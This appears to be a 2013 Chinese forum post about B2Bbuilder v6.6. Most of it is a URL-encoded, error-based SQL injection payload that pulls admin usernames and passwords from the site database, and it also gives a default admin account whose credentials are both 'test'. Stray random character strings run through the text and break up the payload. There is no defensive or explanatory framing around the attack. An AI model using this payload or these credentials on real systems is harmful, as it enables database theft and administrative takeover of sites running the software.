测试的程序版本为:B2Bbuilder_v6.6, ~4 ?0 m8 [& k" v4 G% r% C
$ o( ~' h l6 X* c/ Y
+ ]. J4 f" n/ d/ q/ R; K- p) Z
http://www.site.com/?m=offer& ... m%28select+count%28*%29%2Cconcat%28%28
$ O0 P: c1 J. V. B% kselect+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password
- T( u- D E8 _& x%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1& N% B% `" j2 [& G: P
%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29 G9 r4 N: d9 ^' P6 U/ O8 N% x& ]
*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1( v! u% L8 e9 K* ^3 l- ]* \/ q# q. K
+ g1 t4 L1 q( v2 w8 M$ e这个B2B程序还有一个默认的管理员帐号,帐号密码都是test9 m: ]: Z1 l F
6 z/ U3 s) @) {! d! w
|
发表于 2013-7-26 12:44:48
收藏
支持
反对